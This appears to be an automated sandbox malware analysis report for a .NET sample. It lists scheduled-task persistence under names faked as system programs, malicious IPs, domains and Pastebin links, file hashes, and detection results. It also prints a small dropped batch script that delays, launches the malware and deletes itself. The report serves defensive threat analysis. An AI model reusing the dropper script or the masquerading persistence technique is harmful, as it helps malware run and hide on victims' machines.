            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 1532 because it is empty
            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 1964 because it is empty
            • Execution Graph export aborted for target HuzhgkcqwYiFfxvhdfMUs.exe, PID 6572 because it is empty
            • Execution Graph export aborted for target portruntime.exe, PID 3212 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            05:37:31API Interceptor12x Sleep call for process: HuzhgkcqwYiFfxvhdfMUs.exe modified
            11:37:27Task SchedulerRun new task: conhost path: "C:\Users\Default\conhost.exe"
            11:37:27Task SchedulerRun new task: conhostc path: "C:\Users\Default\conhost.exe"
            11:37:27Task SchedulerRun new task: HuzhgkcqwYiFfxvhdfMUs path: "C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe"
            11:37:27Task SchedulerRun new task: HuzhgkcqwYiFfxvhdfMUsH path: "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
            11:37:30Task SchedulerRun new task: winlogon path: "C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe"
            11:37:30Task SchedulerRun new task: winlogonw path: "C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe"

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            172.67.19.24sostener.vbsGet hashmaliciousRemcosBrowse
            • pastebin.com/raw/V9y5Q5vv
            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
            • pastebin.com/raw/NsQ5qTHr
            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
            • pastebin.com/raw/NsQ5qTHr
            Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
            • pastebin.com/raw/NsQ5qTHr
            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
            • pastebin.com/raw/NsQ5qTHr
            5.101.153.57yx18iwwPFF.exeGet hashmaliciousDCRatBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              pastebin.comLisectAVT_2403002B_361.exeGet hashmaliciousQuasarBrowse
              • 172.67.19.24
              Lisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
              • 104.20.4.235
              wdOEfoZ2zn.exeGet hashmaliciousDCRatBrowse
              • 104.20.3.235
              611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
              • 104.20.4.235
              25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
              • 104.20.3.235
              88YW43jlqt.exeGet hashmaliciousDCRatBrowse
              • 172.67.19.24
              installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
              • 104.20.3.235
              aabJ5lAG3l.docGet hashmaliciousUnknownBrowse
              • 104.20.3.235
              updater.exeGet hashmaliciousXmrigBrowse
              • 104.20.4.235
              DeqcE30sLb.exeGet hashmaliciousDCRatBrowse
              • 172.67.19.24
              bg.microsoft.map.fastly.netYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
              • 199.232.214.172
              oz9Blof9tN.msiGet hashmaliciousCobaltStrikeBrowse
              • 199.232.214.172
              QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 199.232.210.172
              invoker.ps1Get hashmaliciousUnknownBrowse
              • 199.232.210.172
              http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
              • 199.232.214.172
              http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
              • 199.232.210.172
              http://apple.vn377.com/Get hashmaliciousUnknownBrowse
              • 199.232.214.172
              http://apple.dogwog.com/Get hashmaliciousUnknownBrowse
              • 199.232.210.172
              https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaramGet hashmaliciousHTMLPhisherBrowse
              • 199.232.214.172
              http://apple.fnf478.com/Get hashmaliciousUnknownBrowse
              • 199.232.210.172

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BEGET-ASRUyx18iwwPFF.exeGet hashmaliciousDCRatBrowse
              • 5.101.153.57
              Fake Intel (1).exeGet hashmaliciousFareit, KeliosBrowse
              • 31.129.99.189
              http://relsoftware.comGet hashmaliciousHTMLPhisherBrowse
              • 87.236.16.245
              Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
              • 45.130.41.127
              http://vfxfilmschool.comGet hashmaliciousUnknownBrowse
              • 45.130.41.123
              docs_pdf.exeGet hashmaliciousFormBookBrowse
              • 45.130.41.38
              G6uGAyUSVscVBYD.exeGet hashmaliciousFormBookBrowse
              • 45.130.41.127
              SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
              • 45.130.41.38
              purchase order_pdf.exeGet hashmaliciousFormBookBrowse
              • 45.130.41.38
              xx-cheat_2.exeGet hashmaliciousUnknownBrowse
              • 45.130.41.127
              CLOUDFLARENETUSYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
              • 104.21.65.79
              rwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
              • 188.114.97.3
              QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 188.114.96.3
              CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
              • 188.114.96.3
              FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 104.26.2.16
              8SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
              • 188.114.97.3
              e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 104.26.2.16
              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
              • 188.114.96.3
              https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
              • 172.67.37.149
              NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
              • 172.67.177.136

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0eYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
              • 172.67.19.24
              QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 172.67.19.24
              FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 172.67.19.24
              e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 172.67.19.24
              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
              • 172.67.19.24
              SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
              • 172.67.19.24
              SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
              • 172.67.19.24
              engine.ps1Get hashmaliciousUnknownBrowse
              • 172.67.19.24
              invoker.ps1Get hashmaliciousUnknownBrowse
              • 172.67.19.24
              tgmes.ps1Get hashmaliciousUnknownBrowse
              • 172.67.19.24

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76d

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (789), with no line terminators
              Category:dropped
              Size (bytes):789
              Entropy (8bit):5.8896689156498105
              Encrypted:false
              SSDEEP:24:Odg5aBbTL9ucK3QR6H3+acsKSpySxRpjsK1F9p1uLdO:Z5ATLbB6XTDrjpoK1LLkO
              MD5:A701D3DB64F41BD080B4B0BC6B84B293
              SHA1:EEAD37E80A1B04C86AEA0EE9A43067B7D339B9B0
              SHA-256:366F803B912BDB018A48A2352DCE35DDC5F905433C88B7B575AB8847C5E9C8D9
              SHA-512:D5685E52C96D1589BB55F698B77936B0371B57217EC5910CE872CA457915F1BB598F793085232F241FB09C59947AF2BE9C2CDBD46897CE8B41960421759D5C66
              Malicious:false
              Preview:mSVehalkpenT96TMoKvYlCvD6V5KqnwhEGzxSvGohCU4RLGRYGu3lxKkhSiMea4CsFO3Gg43DH0jr0wuOowj226R5PQAN4JHISMM7NL1L10e7l3qfx70nUJzJ770P4pJ7taYnkxAc5YACcUTWkea6SdyJXC9PVmRLrgNLfC596Ys6IxqnnepaPMpPlOQhyvHSGzV5GI1hia94u2AjVVl0605e17jQvYLLRZzTcvhfnI2zMvftOrLcJQWQ30EIjlvJPxnUDrHkyGNy8GRGczBENsCADjalqY5BWtjZIKqhjkoCDhSwj8ptjr5gvmReQf4ZLLcPg28SJeemEA7fQnCstLcoxDnf2MQEqO01FCPqAXkENTcvpwNndLqAtxcdOcZ6Oa6zJFZNYVsWkYbdk2zG9nlei0ISkvch7ozwWmmjW9OHdUZUV83WnS7lzbRS7Hmm3KY6joH8QQuAYdBObx6m2F4oqN75VUlPWlNS5cvq14FXi7NVaD0KKAuxQtPVrLm6ofowQsS8CPv7AgGtAmeSdbEV1ZCLNa9pSJtDTaEsu2H5OwxtngUFqUcMbS51qGvlQGp0xCakhwhlUJHElShqF487rhlBeNCnGgpIH75kGuh3x12SK1PXiEgVHrJQaZFTu3exd96oW6kVWEKzoT0m7oEB9TAaxpKqoOJ3WEyL5lBmeL9ChTlHidWGycyK8g0rw3qI5QckfprWnchyU82eDCIL2DF4PnNYvTzke1GQ0Al3vAcV4A09nWntvfQ2LiV1cSkTn6Td1mnCbOZ1kt9P

              C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7b

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):212
              Entropy (8bit):5.692847036503528
              Encrypted:false
              SSDEEP:6:CpUekWgoOcZYmIcSWm3xVs5ZyFUzo8JWNnl:CGcgR4hYkVzrJWBl
              MD5:805621B584A26CEDF523A088DC8914DD
              SHA1:D9040C2E5B454F2E591AF76BE0F8C595969F7F98
              SHA-256:7A00ECB699A64EE0F18F692324620309355551FFC7A5AF7E7A9E7AB3BB8BD2C5
              SHA-512:6D11EBC9768C6A16D90363B3A0E964B09FC436DA1738A5BFE6392F0185EC95CA85A0CEFB1CCABC7FD0FCA725AF2BEA960857528127B195BBEE5F727111B3B864
              Malicious:false
              Preview:ZscSO432Lx3MApIQjxEJZqWgbtt8aM0cOs67pawIlh1E6cWXq83957xtV50eK4b96a7RsKlIA6h1ySj8XVScS1hQ5NmtjR7qG2HgeEofXu89a64CW1Hzm9qF3rWfi1js80v6KDdTqwEi3h08SjWrKIEGMCmxrJ7fLPAjK82TYxIz4IMW0XN8f1h0vptIaplhzjWngRyTrDTXAPLE0Q7T

              C:\Users\Default\088424020bedd6

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (736), with no line terminators
              Category:dropped
              Size (bytes):736
              Entropy (8bit):5.887951113595641
              Encrypted:false
              SSDEEP:12:UBeVqKB8ay/DpPhD+2IgzIcL9WjM+pP/hVJbqcrunroiemIeYjonV62vT2i3Q7Ui:UBeVqKKN/DpPk2IUIcLSMSPZrEnSmINd
              MD5:2C085A9489F780F6F791311F22F2F269
              SHA1:339EC11C22C8EA83AEBC881FB4DAC0113F5E5926
              SHA-256:0E0111D0A178C2D44A35D46BFCAF995C985D686A43047E5DF62B4874D3471089
              SHA-512:96C1C8FBEDD886F1815AA52C1E006B12D4D09DECB2697129825E7FAFB831367500107EE24BF98B32F6C2EA8974F2877897E8A9AAC4FFF11335AA948338C2D4CF
              Malicious:false
              Preview:AxNrhCsQ0Q8r1YKSvVFtaRoYIOuRBDCDGXc9chsUTkWeMunIKFodGfTsIyiSRaOxN4ld5K0OmuZz5KLXlmG6Yj7kEu1n8ZD2ViQSJJNAOa0VGew8mKrpUSYo7AZKTMPNrhdW33ObZGr8tlek72AxsYiDKmVIuCqBKmoiBaEt6PQNlZ4VfyNaMbfS9ZLRiFrWZpxG75jhxR1cIUcur9m5zQztHVjlOwK0h3x5mxYkPpm5jCKo7akjcwhJzE9lW8TBGB4OhgI3lCpJn4JEK5nxMlXvVoFhywORWlziI5HbSq7aHXg554aaUfzenI33alFyyXwBFk6PyMffn7o7HKm4Wx71wU59COAqlJltle0V8LmIAT0pe5vQ8LcAa5Ouo6MjMy3eW5WnUR5KKz1ceQeHctsarkSpPFqB8C6LaVTjiI6rPR0lEvQYbFGcGcxvmrXOk4MH3pCI65jUxALZurkdyRj36dF7ih70vsGUFssZtIbgfwpGQXA4G3ZTVSLZkEjZ7sjF31TC8LuqzCXJy9rKgCt1Sx9wgTypiCiwMkMZE855IseS4BllXZ258rwG1ggpWFIwel7NwRGiGytjTr2esNRJKnxexFihbQiDkryTEXyFSTyK8MxKoC7Jx8m0xcartjG0Qq9l2iZUYL01yngkSX2ZSZPlF7gl6HWtM84SNLRFmmulIuCJ6zYVqri0aXg5CxXRzHoztOXGGwxppndU5WpHsBCfaD10

              C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\Default\be621495aa6c7b

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with very long lines (679), with no line terminators
              Category:dropped
              Size (bytes):679
              Entropy (8bit):5.89542598666075
              Encrypted:false
              SSDEEP:12:VaXXp02Pc1BB3TQ9CjFWziOA5YfFpF0N5VGSzjwluz29CKk2/rdXhzFEcn7HUJCM:UJ0n1BBUWWz3+I0TVHzjwluz29CKmI7o
              MD5:97029C06ED3EF07213F0706B32F8195C
              SHA1:4C1A75904D116B674D901C5742EC41B77BAE5796
              SHA-256:2EB798AE4691FC639EB2F2DB447F2F5FE02975FA530013BF71C32A06BA5A59B0
              SHA-512:E58D840B01F4499DF5654F573C679B7C5030A3B5D8A2B493805D5CA273BA822C74E5091D5BBD4D98338CA02225966FD1E2AE98482344C49D7E3F1C4088E664DA
              Malicious:false
              Preview:inkNsxFZbBfCoqwuDleSI3YGdSoaAooq4J6Hslcofnmp9veqDmcJrEhpOeuaIpZxWzHfuoBcIzwfQtGrx8WXLe80lR3O0Cf0NzSKo95ZlAA2RCYfXDmKSCm21Q3cvwmGU5Rbb6DyC7vLeGjj2X1xaUiLMaSXFdnyY4hVu7Ea9xIVQbXvrUkY5yq9XFOBnqsjU7xjiNy4TaxmMM5vChpv2O2jOh8otCwTFiBSoyMegpEeBDxLKc9GA7qFENVAPJLQodhnLmHOVKONKYhKuweQDqSH26OacLPWdy0hgJ9hVuvzsd4qqLQcp5M7KavPYrvJ52tWhAnkx64S5cYZBhuQ4wril3WGYuJo9l40uiJphqpsA3CrBVN07fPJKKvonhLCxQTUiiocYEtOH9hr1oECgSreWupjxfBAfm5ukrIdrvc2vABLmDx8cIgejz8y2Fp3CtseDxHJfkVv0ysVsd6tsChWGbLutUklGjzCShIy6nd1wunuHnFZI5L9MWYmmWZL9tpR8pCLVHxEjpkVxanGPLdLX006IfMkOS1CFVvbk3DAHHahvCyMtS5yQe3IyGCz5NzRxhQboLgVIdDQaTKGrA05WDwlcnnd1OE4RItNwWhhwkqxansf66H5W35tvo9BiDe3YI8Rj6TUcSIvX8Kz4Ig4GJhXNAcIXg9tGwZ

              C:\Users\Default\conhost.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................F$..6.......d$.. ....$...@.. ........................%...........@..................................d$.K.....$.......................$...................................................... ............... ..H............text....D$.. ...F$................. ..`.sdata.../....$..0...J$.............@....rsrc.........$......z$.............@..@.reloc........$......~$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HuzhgkcqwYiFfxvhdfMUs.exe.log

              Download File
              Process:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1673
              Entropy (8bit):5.358592927981826
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpv
              MD5:3FA79285624FEE3EDA6CADAE6686B2D7
              SHA1:B4FCD984A014AF609AA60902FAB53EFE05F72D26
              SHA-256:941DC770C2B1ECCBFE753CE22846C885C111EEBF38B74991B54B2D32D5D46466
              SHA-512:2E5B2FC80CAEFCB6D615CC50E4A9250F2A46AFD406720DF016A55AAB09B2EE63A2AED9E7C6832DD6B93318FEFE99EC21D7264207467A764BE078B2226A9002B2
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\portruntime.exe.log

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1915
              Entropy (8bit):5.363869398054153
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
              MD5:E6E3A2B5063C33228E2749DC291A1D3D
              SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
              SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
              SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

              C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):215
              Entropy (8bit):5.1781892964276475
              Encrypted:false
              SSDEEP:6:hITg3Nou11r+DEgCh/UcvKOZG1cNwi23fO/bh:OTg9YDEgChcfZ2/N
              MD5:59D123941E6EBDC1C7CD1CFBDD0B2199
              SHA1:76F50D79ECA81264575886330B88E006FCD13486
              SHA-256:49C4B47FAEF0D51DEDF71377C858CD63FC7F3469D824BC1558CF260BE0E8D89D
              SHA-512:98965781109020A988E58AF1D6A939B3C1CFD5EB2E95346BFF05027E406BC2CD6EB1CD0B99788D1E4154C2EEA246343216263AEBFBD48C228F9A0AC3CB179F5B
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TpLSZl35nU.bat"

              C:\Users\user\AppData\Local\Temp\kxib6YnpdJ

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.483856189774723
              Encrypted:false
              SSDEEP:3:pdJynGSR:zJ03
              MD5:274239029F668394F4A1C17D6D2850BB
              SHA1:4314D10C46DE0CE4195760D7BF521D2563F9DD7E
              SHA-256:3A9044547409552FBAF3684B1DE7E7178DC057AB3337BB1638B6AE11496B5618
              SHA-512:664C3744F5A407CFF0691C57CA33CC12028D052F4F371659C5D8D4887F1D9A36B4B86043ED8EAE9439CE27F2D7AF9FB98DE5C95B1291F7C3BC176925F5343726
              Malicious:false
              Preview:gRLY8zxwcBxN2KBEfr106mTM4

              C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe

              Download File
              Process:C:\brokermonitordhcp\portruntime.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2392064
              Entropy (8bit):7.602728589366172
              Encrypted:false
              SSDEEP:49152:i8c1CwZZmO9DQC6pX/PiyS3DAKF6aMS8gRDs6/STCqs82kPq5Xom:i8UCwZZ2rR/Pi1UraxTKTCRem
              MD5:DE91A616A55A97BB434BC118AF3E0E7B
              SHA1:D489795B1A54E11703F50E06F97FBF971446FDE1
              SHA-256:103B85E8B21ECE8CC40D4C9DAF93ED6CAF90C27C2E933CCF9749027AA2FAAB80
              SHA-512:DE5FBC67A1C5936F28A120D176AA7FEC7DF752D1C131B2FBEC4EB57DB3A69445C8708D5DE52FBAC2FF9484285D18E91943C94D51E5437674A9039906F3D1DBBF
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 88%
              • Antivirus: Virustotal, Detection: 68%, Browse
